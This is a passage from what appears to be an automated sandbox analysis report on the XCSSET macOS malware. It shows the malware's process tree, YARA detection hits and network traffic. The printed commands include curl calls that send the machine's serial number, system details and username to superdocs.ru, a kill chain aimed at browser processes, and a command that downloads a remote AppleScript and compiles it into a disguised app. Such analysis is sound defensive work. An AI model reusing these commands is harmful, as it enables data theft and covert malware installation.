            • sysctl (MD5: 340b13a50d8ee5cfcc91d8480aa5cbe6) Arguments: sysctl -n machdep.cpu.brand_string
            • sh New Fork (PID: 1064, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1065, Parent: 1064)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1066, Parent: 1064)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1067, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
            • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
            • sh New Fork (PID: 1068, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ps aux | grep -E 'com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede' | grep -v grep | awk '{print $2}' | xargs kill -9
              • bash New Fork (PID: 1069, Parent: 1068)
              • ps (MD5: 48b7f71ab3866eee46d3ef67f8233168) Arguments: ps aux
              • bash New Fork (PID: 1070, Parent: 1068)
              • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -E com.apple.net|com.utils.core|com.metal.core|agentde|canaryde|operade|speedde|edegede|firefoxde|yandexde|avatarde|bravede
              • bash New Fork (PID: 1071, Parent: 1068)
              • grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -v grep
              • bash New Fork (PID: 1072, Parent: 1068)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk {print $2}
              • bash New Fork (PID: 1073, Parent: 1068)
              • xargs (MD5: 8f884810645d2a6e0b1a4d499993857c) Arguments: xargs kill -9
            • sh New Fork (PID: 1074, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain
            • sh New Fork (PID: 1075, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'
              • bash New Fork (PID: 1076, Parent: 1075)
              • ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2
              • bash New Fork (PID: 1077, Parent: 1075)
              • awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}
            • sh New Fork (PID: 1078, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l
            • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d updated .domain with superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l
            • sh New Fork (PID: 1079, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c echo ~/Library/Caches/GitServices/.rep
            • sh New Fork (PID: 1080, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' || echo 9999999999
              • bash New Fork (PID: 1081, Parent: 1080)
              • date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date -r /Users/pedro/Library/Caches/GitServices/.rep +%s
            • sh New Fork (PID: 1082, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c date +'%s'
            • date (MD5: 9983eb16b31b7224ae79b51b2b49ee75) Arguments: date +%s
            • sh New Fork (PID: 1083, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' || echo '0'
            • sh New Fork (PID: 1084, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'
            • mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/
            • sh New Fork (PID: 1085, Parent: 1037)
            • bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript | osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'
              • bash New Fork (PID: 1086, Parent: 1085)
              • curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -sk -d user=pedro https://superdocs.ru/agent/scripts/remove_old.applescript
  • cleanup
SourceRuleDescriptionAuthorStrings
exec.2430808EXT_SUSP_OBFUSC_macOS_RootHelper_ObfuscatedYara for the public tool \'roothelper\'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)im0prtp3
  • 0x3f78:$a1: E: neither argv[0] nor $_ works.
  • 0x3f99:$c1: %s%s%s: %s\x0A
  • 0x3f60:$c2: x%lx
  • 0x3f65:$c3: =%lu %d
  • 0x3f6d:$c4: %lu %d%c
  • 0x36b1:$opcodes_3: E8 9A FD FF FF 8B 85 E8 FD FF FF 2B 85 D0 FD FF FF 83 C0 01 89 85 EC FD FF FF E9 0A 00 00 00
SourceRuleDescriptionAuthorStrings
/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/aJoeSecurity_XCSSETYara detected XCSSETJoe Security
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: /usr/bin/curl (PID: 979)Writes from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: 982)Writes from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: 1034)Writes from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: 1043)Writes from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: 1067)Writes from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: 1078)Writes from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: 1086)Writes from socket in process: dataJump to behavior
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49348
    Source: unknownNetwork traffic detected: HTTP traffic on port 49351 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49347
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49346
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49345
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49344
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49343
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49342
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49341
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49340
    Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49339 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49342 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49339
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49338
    Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49337
    Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49336
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49335
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49334
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49333
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49332
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49331
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49330
    Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49347 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49329
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49328
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49327
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49325
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49323
    Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49322
    Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49321
    Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49320
    Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49357 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49344 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49319
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49318
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49317
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49316
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49315
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49314
    Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49313
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49312
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49311
    Source: unknownNetwork traffic detected: HTTP traffic on port 49304 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49310
    Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49341 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49309
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49308
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49307
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49306
    Source: unknownNetwork traffic detected: HTTP traffic on port 49349 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49305
    Source: unknownNetwork traffic detected: HTTP traffic on port 49326 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49304
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49303
    Source: unknownNetwork traffic detected: HTTP traffic on port 49303 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49302
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49301
    Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49355 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49358 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49343 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49353 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49340 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49358
    Source: unknownNetwork traffic detected: HTTP traffic on port 49325 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49357
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49356
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49355
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49354
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49353
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49352
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49351
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
    Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49356 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49345 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49349
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 24 Aug 2022 09:18:41 GMTContent-Type: text/htmlContent-Length: 162Connection: close
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
    Source: applet, 00001023.00000508.1.0000000113511000.0000000113cdb000.r--.sdmpString found in binary or memory: http://www.apple.com/Copyright
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmp, CodeResources.469.dr, com.apple.spx.plist.495.dr, Info.plist.468.dr, Info.plist.475.dr, sh-thd-4984109211.494.drString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
    Source: a.537.drString found in binary or memory: https://superdocs.ru/l
    Source: applet, 00001023.00000508.1.0000000111dd3000.0000000111ddb000.r--.sdmp, applet, 00001023.00000508.1.0000000112cf3000.0000000112d03000.r--.sdmp, applet, 00001023.00000508.1.00000001131ce000.00000001131d6000.r--.sdmp, applet, 00001023.00000508.1.000000011a215000.000000011a246000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
    Source: unknownHTTP traffic detected: POST /apple/com.php HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: */*Content-Length: 51Content-Type: application/x-www-form-urlencoded
    Source: /usr/bin/curl (PID: 979)Reads from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: 982)Reads from socket in process: dataJump to behavior
    Source: /usr/bin/curl (PID: <